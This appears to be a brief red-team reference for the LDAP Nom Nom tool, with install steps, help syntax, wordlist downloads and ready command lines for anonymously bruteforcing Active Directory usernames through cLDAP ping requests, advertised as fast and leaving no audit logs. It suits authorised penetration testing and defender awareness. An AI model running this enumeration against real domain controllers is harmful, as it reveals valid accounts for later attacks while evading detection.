LDAP Nom Nom

Quietly and anonymously bruteforce Active Directory usernames at insane speeds from Domain Controllers by (ab)using LDAP Ping requests (cLDAP). Looks for enabled normal user accounts.

Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP).

LDAP Ping (Microsoft)
LDAP Nom Nom (GitHub)

Installation

Help

Bruteforce AD usernames

No Windows audit logs generated! High speed ~ up to 10K/sec – go beyond 25K/sec with multiple servers!

Installation

sudo apt update

sudo apt install golang

go install github.com/lkarlslund/ldapnomnom@latest

Help

~/go/bin/ldapnomnom -h

ldapnomnom [--server dc1.domain.suffix[,dc2.domain.suffix] | --dnsdomain domain.suffix] [--port number] [--tlsmode notls|tls|starttls] [--input filename] [--output filename [--progressbar]] [--parallel number-of-connections] [--maxservers number-of-servers] [--maxstrategy fastest|random] [--throttle n] [--maxrequests n]

Bruteforce AD usernames

Download wordlists of usernames

wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Usernames/Names/names.txt

wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Usernames/xato-net-10-million-usernames.txt

wget https://raw.githubusercontent.com/lisandre-com/Wordlists/main/xato-net-10-million-usernames-10000.txt

Bruteforce

~/go/bin/ldapnomnom -server dc01.example.com -dnsdomain example.com -input names.txt

~/go/bin/ldapnomnom --input xato-top10000 --output nomnom-results.txt --server dc01.example.com -dnsdomain example.com --parallel 4

~/go/bin/ldapnomnom --input xato-top10000 --output nomnom-results.txt --server dc01.example.com,dc02.example.com -dnsdomain example.com --parallel 16